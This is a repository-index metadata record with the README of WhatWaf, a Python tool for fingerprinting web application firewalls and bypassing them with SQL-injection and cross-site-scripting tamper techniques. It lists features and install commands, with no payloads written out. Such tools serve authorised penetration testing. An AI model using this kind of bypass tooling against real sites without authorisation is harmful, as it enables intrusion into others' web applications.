{"id":13469343,"url":"https://github.com/Ekultek/WhatWaf","last_synced_at":"2025-03-26T06:32:07.911Z","repository":{"id":37484545,"uuid":"114396972","full_name":"Ekultek/WhatWaf","owner":"Ekultek","description":"Detect and bypass web application firewalls and protection systems","archived":false,"fork":false,"pushed_at":"2024-08-11T00:19:13.000Z","size":411,"stargazers_count":2739,"open_issues_count":477,"forks_count":451,"subscribers_count":74,"default_branch":"master","last_synced_at":"2025-03-20T05:09:22.815Z","etag":null,"topics":["bypass","detection","fingerprinting","firewall","waf","web-application","web-application-firewall","web-application-firewall-bypassing"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Ekultek.png","metadata":{"files":{"readme":".github/README2.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2017-12-15T17:47:45.000Z","updated_at":"2025-03-19T18:29:46.000Z","dependencies_parsed_at":"2024-01-25T12:07:18.255Z","dependency_job_id":"72a20f5f-c1a5-497c-b4d2-4c28cfa83bdf","html_url":"https://github.com/Ekultek/WhatWaf","commit_stats":{"total_commits":389,"total_committers":14,"mean_commits":"27.785714285714285","dds":0.6683804627249357,"last_synced_commit":"e8003dba130d296c0ce7efe57d5ada50fe846da4"},"previous_names":[],"tags_count":6,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ekultek%2FWhatWaf","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ekultek%2FWhatWaf/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ekultek%2FWhatWaf/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ekultek%2FWhatWaf/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ekultek","download_url":"https://codeload.github.com/Ekultek/WhatWaf/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245604109,"owners_count":20642939,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass","detection","fingerprinting","firewall","waf","web-application","web-application-firewall","web-application-firewall-bypassing"],"created_at":"2024-07-31T15:01:34.929Z","updated_at":"2025-03-26T06:32:06.334Z","avatar_url":"https://github.com/Ekultek.png","language":"Python","funding_links":[],"categories":["Python","Open Sources Intelligence (OSINT)","Tools","Web Exploitation"],"sub_categories":["Web application and resource analysis tools","Web Exploitation","Penetration Testing Report Templates"],"readme":"# Features\n - Ability to run on a single URL with the `-u/--url` flag\n - Ability to run through a list of URL's with the `-l/--list` flag\n - Ability to detect over 70+ different firewalls\n - Ability to try over 30+ different tampering techniques\n - Ability to pass your own payloads either from a file, from the terminal, or use the default payloads\n - Default payloads that _should_ produce at least one WAF triggering\n - Ability to bypass firewalls using both SQLi techniques and cross site scripting techniques\n - Ability to run behind any proxy type that matches this regex:`(socks\\d+)?(http(s)?)?://` (socks5, socks4, http, https)\n - Ability to use a random user agent, personal user agent, or custom default user agent\n - Auto assign protocol to HTTP or ability to force protocol to HTTPS\n - A built in encoder so you can encode your payloads into the discovered bypasses\n - Automatic issue creation if an unknown firewall is discovered\n - Ability to send output to a JSON, CSV, or YAML file\n - Ability to encode provided payloads using builtin tamper scripts\n - Encoded payloads are then saved into a database file for future use\n - Ability to export cached payloads from the database to a YAML, JSON, CSV, or textual file\n - Ability to save all traffic into files for further analysis by passing the `--traffic` flag\n - Ability to try and determine the backend webserver hosting the web application using `-W`\n - Ability to send POST or GET requests\n - Ability to pass in your own custom headers\n - More to come...\n\n# Installation\n\nInstalling whatwaf is super easy, whatwaf is compatible with Python2 and Python3, all you have to do is the following:\n\n```bash\n./setup.sh install\n```\n\nThis will install whatwaf into `~/.whatwaf/.install/bin` which will allow you to run it from the terminal just by using `whatwaf`\n\nYou can also install it manually by running the following:\n```\nsudo -s \u003c\u003c EOF\ngit clone https://github.com/ekultek/whatwaf.git\ncd whatwaf\nchmod +x whatwaf.py\npip install -r requirements.txt\n./whatwaf.py --help\nEOF\n```\n\nOr you can run whatwaf in a virtual environment by doing the following (requires `virtualenv` to be installed):\n```bash\nsudo -s \u003c\u003c EOF\npip install virtualenv\ngit clone https://github.com/ekultek/whatwaf.git\ncd whatwaf\nchmod +x whatwaf.py\nvirtualenv venv \u0026\u0026 source venv/bin/activate\npip install -r requirements.txt\n./whatwaf.py --help\nEOF\n```\n\nYou can also install whatwaf using Docker with the following:\n```\ngit clone https://github.com/ekultek/whatwaf\ncd whatwaf\nsudo docker build -t whatwaf .\nsudo docker run -it whatwaf whatwaf --help\n```\n\n# Proof of concept\n\nFirst we'll run the website through WhatWaf and figure out which firewall protects it (if any):\n![item1](http://i67.tinypic.com/142y9s6.png)\n\nNext we'll go to that website and see what the page looks like:\n![item2](http://i64.tinypic.com/262mjhl.png)\n\nHmm.. that doesn't really look like Cloudflare does it? Lets see what the headers say:\n![item4](http://i66.tinypic.com/5txx5x.png)\n\nAnd finally, lets try one of the bypasses that it tells us to try:\n![item3](http://i66.tinypic.com/sdi3x0.png)\n\n# Demo video\n\n[![to_video](http://i67.tinypic.com/2daawow.png)](https://vimeo.com/247623511)\n\n# Get involved!\n\nIf you want to make some tamper scripts, want to add some functionality or just want to make something look better. Getting involved is easy:\n\n 1. Fork the repository\n 2. Edit the code to your liking\n 3. Send a pull request\n\nI'm always looking for some helpful people out there, and would love help with this little side project I got going on, Thanks! \n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FEkultek%2FWhatWaf","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FEkultek%2FWhatWaf","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FEkultek%2FWhatWaf/lists"}